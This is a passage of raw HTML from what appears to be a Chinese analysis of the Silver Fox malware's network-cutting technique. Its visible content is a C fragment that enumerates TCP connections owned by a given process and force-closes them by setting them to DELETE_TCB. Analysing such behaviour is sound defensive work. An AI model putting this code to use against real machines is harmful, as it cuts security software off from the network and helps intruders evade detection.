Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> closedCount </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">for</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD i </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> i </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&lt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> tcpTable</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">-&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwNumEntries</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">++</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">i</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">MIB_TCPROW2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> row </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> tcpTable</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">-&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">table</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">[</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">i</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">];</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">row</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwOwningPid </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">==</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pid </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> row</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwState </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">==</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> MIB_TCP_STATE_ESTAB</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span><span leaf="">MIB_TCPROW2 rowToSet </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> row</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span><span leaf="">rowToSet</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwState </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> MIB_TCP_STATE_DELETE_TCB</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span><span leaf="">DWORD result </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> MySetTcpEntry</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">((</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">MIB_TCPROW_OWNER_PID</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">*)&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">row</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">result </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">==</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> NO_ERROR</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">                </span></span><span leaf="">closedCount</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">++;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">                </span></span><span leaf="">IN_ADDR localAddr </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> row</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: 